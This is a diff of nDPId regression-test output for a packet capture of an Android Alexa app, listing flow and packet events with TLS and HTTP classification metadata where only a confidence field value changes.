00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071583,"flow_last_seen":1490976071583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071583,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1490976071583,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071583,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8H+ZAAEAGJwmsECrYNF7ohrKCAbsHHkWgAAAAAKAC\/\/\/3+QAAAgQFtAQCCAoA9lpGAAAAAAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1490976071640,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071640,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwgCVAAOcGH9U0XuiGrBAq2AG7soJWhIA2Bx5FoXASH\/6YhgAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1490976071641,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071641,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoH+dAAEAGJxysECrYNF7ohrKCAbsHHkWhVoSAN1AQAVfi9wAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071583,"flow_last_seen":1490976071642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1063,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071583,"flow_last_seen":1490976071700,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071700,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1076,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071385,"flow_last_seen":1490976071803,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1490976071803,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071583,"flow_last_seen":1490976071642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1063,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071583,"flow_last_seen":1490976071700,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071700,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1076,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071385,"flow_last_seen":1490976071803,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1490976071803,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076042,"flow_last_seen":1490976076042,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976076042,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1490976076042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976076042,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BbZAAEAGQTmsECrYNF7ohpD5Abuu0lmyAAAAAKAC\/\/9b\/gAAAgQFtAQCCAoA9lwEAAAAAAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1490976076114,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976076114,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMG5AAOcGb4w0XuiGrBAq2AG7kPnjZM+NrtJZs3ASH\/4iEQAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1490976076117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976076117,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBbdAAEAGQUysECrYNF7ohpD5Abuu0lmz42TPjlAQAVdsggAA"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076042,"flow_last_seen":1490976076117,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076117,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976076042,"flow_last_seen":1490976076167,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076042,"flow_last_seen":1490976076117,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076117,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976076042,"flow_last_seen":1490976076167,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076275,"flow_last_seen":1490976076275,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976076275,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1490976076275,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976076275,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Bx5AAEAGP9GsECrYNF7ohsHNAFDXKVsFAAAAAKAC\/\/8C1AAAAgQFtAQCCAoA9lwbAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1490976076338,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976076338,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwijBAAOcGFco0XuiGrBAq2ABQwc3F00\/v1ylbBnASH\/5mLQAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1490976076340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976076340,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBx9AAEAGP+SsECrYNF7ohsHNAFDXKVsGxdNP8FAQAVewngAA"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076275,"flow_last_seen":1490976076341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976076341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076275,"flow_last_seen":1490976076341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976076341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976080485,"flow_last_seen":1490976080485,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976080485,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1490976080485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976080485,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80qBAAEAGOXysECrYIsc08JYEAbs8Ao8fAAAAAKAC\/\/9XyQAAAgQFtAQCCAoA9l2\/AAAAAAEDAwg="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1490976080542,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976080542,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7lgTyw5w6PAKPIKASaN+a6gAAAgQFtAQCCApEF4DYAPZdvwEDAwg="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1490976080543,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976080543,"pkt":"AMDKkaPvePiC0\/vCCABFAAA00qFAAEAGOYOsECrYIsc08JYEAbs8Ao8g8sOcO4AQAVcxOQAAAQEICgD2XcZEF4DY"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976080485,"flow_last_seen":1490976080544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976080544,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1146,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976080485,"flow_last_seen":1490976080606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1490976080606,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976080485,"flow_last_seen":1490976080607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3649,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1490976080607,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976080485,"flow_last_seen":1490976080544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976080544,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1146,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976080485,"flow_last_seen":1490976080606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1490976080606,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976080485,"flow_last_seen":1490976080607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3649,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1490976080607,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} 